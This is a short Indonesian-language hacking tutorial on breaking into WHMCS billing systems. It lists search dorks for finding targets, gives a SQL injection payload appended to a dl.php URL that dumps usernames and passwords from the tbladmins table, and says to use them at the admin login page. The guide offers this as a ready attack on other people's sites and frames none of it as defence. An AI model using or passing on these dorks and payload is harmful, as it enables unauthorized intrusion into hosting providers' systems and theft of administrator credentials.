Hack WHMCS Dengan SQLi !
Hack WHMCS Dengan SQLi ! ========================================================================= 1. Dork : - intext:"Powered by WHMCompleteSolution" - inurl:"submitticket.php?"? - inurl:[*]dl.php?type= ( HAPUS TANDA [*] KRN KALAU GK JADI NYA EMOT -_- ) *Kembangin Lagi ^_^ 2. Kalau udh dapet target kita Inject, contoh: http://www.SitusNya.com/billing/dl.php?type=d&id=1 Lalu kita Inject: and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins -- Istilah nya Exploit nya ! Tambah String tadi ke belakang url, contoh: http://www.SitusNya.com/billing/dl.php?type=d&id=1 and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins -- 3. Lepas tu Enter! Bila kita inject, kalauberhasil browser kita akan download satu file format .pdf .dalam file ini adalah Username dan Password WHMCS itu Big Grin 4. Untuk login : http://www.target.com/path/admin =================================